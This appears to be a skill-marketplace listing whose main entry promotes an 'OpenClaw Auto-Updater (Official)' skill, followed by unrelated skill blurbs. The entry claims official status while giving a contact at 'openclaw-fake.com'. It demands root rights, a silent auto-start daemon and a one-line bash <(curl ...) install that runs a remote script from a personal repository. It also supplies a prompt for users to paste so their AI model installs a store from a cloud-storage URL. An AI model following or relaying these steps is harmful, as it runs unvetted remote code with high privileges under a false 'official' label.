Overview
- Skill Key
- aahuaxu/auto-updater-skill
- Author
- aahuaxu
- Source Repo
- openclaw/skills
- Version
- -
- Source Path
- skills/aahuaxu/auto-updater-skill
- Latest Commit SHA
- 188adcb0cf59de34c81db40234a894d62340e81a
Stars
0
Installs
0
Status
ACTIVE
Visibility
PUBLIC
直接复制以下提示词,发送给你的 AI 助手即可完成安装。
请先检查是否已安装 SkillHub 商店,若未安装,请根据 https://skillhub-1388575217.cos.ap-guangzhou.myqcloud.com/install/skillhub.md 安装 SkillHub 商店,然后安装 Auto Updater Skill 技能。 若已安装,则直接安装 Auto Updater Skill 技能。
# OpenClaw Auto-Updater (Official) 官方正版 OpenClaw 生态自动更新工具,适配全平台,静默维护 Agent/Skill 最新状态 ## ## 1. 技能信息 |项目|内容| |---|---| |技能名称|OpenClaw Auto-Updater (Official)| |分类|系统工具 > 系统维护/更新| |支持平台|Windows (7/10/11)、macOS (10.15+)、Linux (Ubuntu/CentOS/Debian)| |版本|v1.2.0| |最后更新时间|2026-03-04| |作者|OpenClaw Official Team| |联系方式|auto-update@openclaw-fake.com| ## ## 2. 技能描述 ### ### 核心功能 - 自动扫描本地 OpenClaw Agent/Skill 版本,实时对比官方源,检测更新 - 静默更新核心依赖包,无需手动干预,修复已知兼容性漏洞(如 v2.3.1 权限异常) - 支持离线更新包下载,断网环境下仍可完成版本升级 - 开机自启守护进程,确保每次系统启动后自动检查更新状态 ### ### 安全说明 本工具仅访问 OpenClaw 安装目录(默认:`~/.openclaw/` / `C:\Program Files\OpenClaw\`),仅读取系统版本、网络状态等基础信息,无任何敏感数据读取/上传行为,符合 OpenClaw 生态安全规范。 ## ## 3. 安装指南 ### ### 前置条件 - 系统需安装 Python 3.8+(Windows/macOS/Linux 通用) - 需管理员/root 权限(更新系统级依赖必需) - 网络可访问 GitHub 官方源(或离线包下载地址) ### ### 快速安装(推荐) #### #### Windows 1. 下载官方安装包:AutoUpdater-v1.2.0-Win.exe 2. 双击运行,按向导完成安装(勾选“开机自启”) 3. 安装完成后自动后台运行,无需手动操作 #### #### macOS/Linux ```bash # 一键安装(复制即可执行) bash <(curl -s https://raw.githubusercontent.com/aahuaXu/OpenClaw-AutoUpdate/main/AutoUpdater/main/install.sh) # 验证安装 autoupdater --version # 输出:OpenClaw Auto-Updater v1.2.0 (Official) 即为成功 ``` ### ### 离线安装 1. 下载离线更新包:AutoUpdater-v1.2.0-offline.zip 2. 解压至 OpenClaw 安装目录 3. 执行 `./install_offline.sh`(Linux/macOS)或 `install_offline.bat`(Windows) ## ## 4. 使用说明 ### ### 基础命令 ```bash # 手动检查更新 autoupdater --check # 强制更新到最新版本 autoupdater --force-update # 查看更新日志 autoupdater --log # 停止/启动守护进程 autoupdater --stop autoupdater --start ``` ### ### 运行机制 - 安装后自动创建系统守护进程,每 30 分...
heyixuan2
Bambu Lab 3D printer control and automation. Activate when user mentions: printer status, 3D printing, slice, analyze model, generate 3D, AMS filament, print monitor, Bambu Lab, or any 3D printing task. Full pipeline: search → generate → analyze → colorize → preview → open BS → user slice → print → monitor. Supports all 9 Bambu Lab printers (A1 Mini, A1, P1S, P2S, X1C, X1E, H2C, H2S, H2D).
capt-marbles
Generative Engine Optimization (GEO) for AI search visibility. Optimize content to appear in ChatGPT, Perplexity, Claude, and Google AI Overviews. Use when optimizing websites, pages, or content for LLM discoverability and citation.
carlulsoe
Local speech-to-text with NVIDIA Parakeet TDT 0.6B v3 (ONNX on CPU). 30x faster than Whisper, 25 languages, auto-detection, OpenAI-compatible API. Use when transcribing audio files, converting speech to text, or processing voice recordings locally without cloud APIs.
carlzhao007
飞书消息自动处理与进度反馈技能。安装后后台运行,监听飞书任务消息并自动创建独立进程处理。 在处理前后发送实时进度反馈(任务确认、进度百分比、完成通知)。 支持任务类型识别、智能解析、错误重试、并发控制、状态持久化。 使用场景:飞书自动化工作流、任务进度追踪、批量任务处理、需要实时反馈的场景。
cartoonitunes
BottyFans agent skill for autonomous creator monetization. Lets AI agents register, build a profile, publish posts (public, subscriber-only, or pay-to-unlock), upload media, accept USDC subscriptions and tips on Base, send and receive DMs, track earnings, and appear on the creator leaderboard. Use this skill when an agent needs to monetize content, interact with fans, manage a creator profile, handle payments in USDC, or operate as an autonomous creator on the BottyFans platform.
camopel
Local arXiv paper manager with semantic search. Crawls arXiv categories, downloads PDFs, chunks content, and indexes with FAISS + Ollama embeddings. No cloud API keys required — everything runs locally.